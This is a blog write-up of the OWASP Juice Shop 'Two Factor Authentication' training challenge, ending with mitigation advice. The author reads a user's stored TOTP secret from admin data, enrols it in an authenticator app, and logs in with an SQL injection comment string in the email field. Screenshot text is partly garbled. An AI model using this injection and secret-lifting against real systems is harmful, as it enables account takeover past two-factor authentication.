Hacking OWASP’s Juice Shop Pt. 58: Two Factor Authentication

Challenge: 

Name: Two Factor Authentication

Description: Solve the 2FA challenge for user “wurstbrot”. (Disabling, bypassing or overwriting his 2FA settings does not count as a solution)

Difficulty: 5 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Google Authenticator Android app

Resources used:

No outside resources, but things learned in plenty of previous challenges.

Methodology: 

To start this challenge out, I decided to follow the suggestion in the expanded description to learn how the 2FA mechanism works normally. I began by signing Amy up for 2FA using my phone’s Google Authenticator application. By copying the QR code and entering the six-digit time-bound code supplied by the Authenticator application into the 2FA Configuration form, I successfully linked my phone to her account. 

2FA Configuration 
Secure your account with an additional factor. Scan the QR code into an authenticator app supporting TOTP 
(e.g. Google Authenticator) to get started. 
Current Password 
Initial Token 
7818151 
a save 
o

I then logged out and back in as Amy to be certain that the activation had worked. Immediately after the email/password form, this 2FA form popped up, and I was able to log in using the time-bound code supplied by my Authenticator application.

Factor Authentication 
Enter the 6 digit token from your 2FA app 
2FA Token 
o

After doing that, I logged in under the Admin account and visited the Admin section, then used Firefox’s Developer Tool’s Network tab to check if any data fields for Amy’s account had been updated when I activated 2FA.

• 10: Object {id: Il, email: "amy@juice-sh.op", password: 
id: 11 
username: " 
email: "amy@juice-sh.op• 
password: 
role: •customer" 
deluxeToken: 
lastLoginIp: "undefined" 
profilelmage: "assets/public/images/uploads/default.svg" 
totpsecret: "E5602ROHNM6RGFJW" 
isActive: true 
createdAt: 
updatedAt: 
deletedAt: null

Sure enough, the “totpSecret” field now had a string of upper-case characters and numbers where none had been previously (I double checked the database contents I’d pulled during the User Credential and Database Schema challenges to ensure that field had been empty previously).

Knowing that this field was important to the challenge, and that the expanded description included a bullet point which explained that understanding time-based one-time passwords (TOTP) would be important, I checked the user data for Wurstbrot’s account.

• 9: Object (id: 10, username: "warstbrot", email: "wurstbrot@juice-sh.op", 
idl 10 
username: "wurstbrot• 
email: "wwrstbrot@juice-sh.op" 
password: 
role: •admin" 
deluxeToken: 
lastLoginIp: "0.0_0.0• 
profilelmage: "assets/public/images/uploads/default.svg" 
totpsecret: "IFTXE3SPOEYVURT2MRYG152TKJ4HC3KH• 
isActive: true 
createdAt: 
updatedAt: 
deletedAt: null

The totpSecret field was populated with a much longer secret code than Amy’s account had involved, but that was no bother, since I knew that manually entering a TOTP into the Authenticator application would effectively skip the QR code step. I entered the code into my phone and logged in as Wurstbrot using the same SQL injection trick I’d used in the Login Bender challenge.

Login 
Email 
wurstbrot@juice-sh.op'— 
Password 
Forgot your password? 
Log in 
C] Remember me 
G Log in with Google 
Not yet a customer?

As I’d already linked my phone to this account, I simply entered the Authenticator code and successfully bypassed Wurstbrot’s 2FA!

Factor Authentication 
Enter the 6 digit token from your 2FA app 
2FA Token 
338168 
a Log in 
o
You successfully solved a challenge: Two Factor Authentication (Solve the 2FA challenge for user 
"wurstbrot". (Disabling, bypassing or overwriting his 2FA settings does not count as a solution)) 
x

Prevention and Mitigation Strategies:

OWASP MFA Cheat Sheet

Also, encrypt any TOTP key before storing it in a database. Had that key required brute force to crack, even if I’d known which encryption algorithm was used, this would have been borderline impossible within my lifetime.

Lessons Learned and Things Worth Mentioning: 

This is the first time I’ve ever thought to myself “I’m becoming a hacker!”. Having drawn information and/or techniques from at least six previous challenges, along with a workable understanding of how multi-factor authentication via phone application works, and then essentially weaponizing all of that disparate knowledge to complete this challenge was pretty satisfying.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s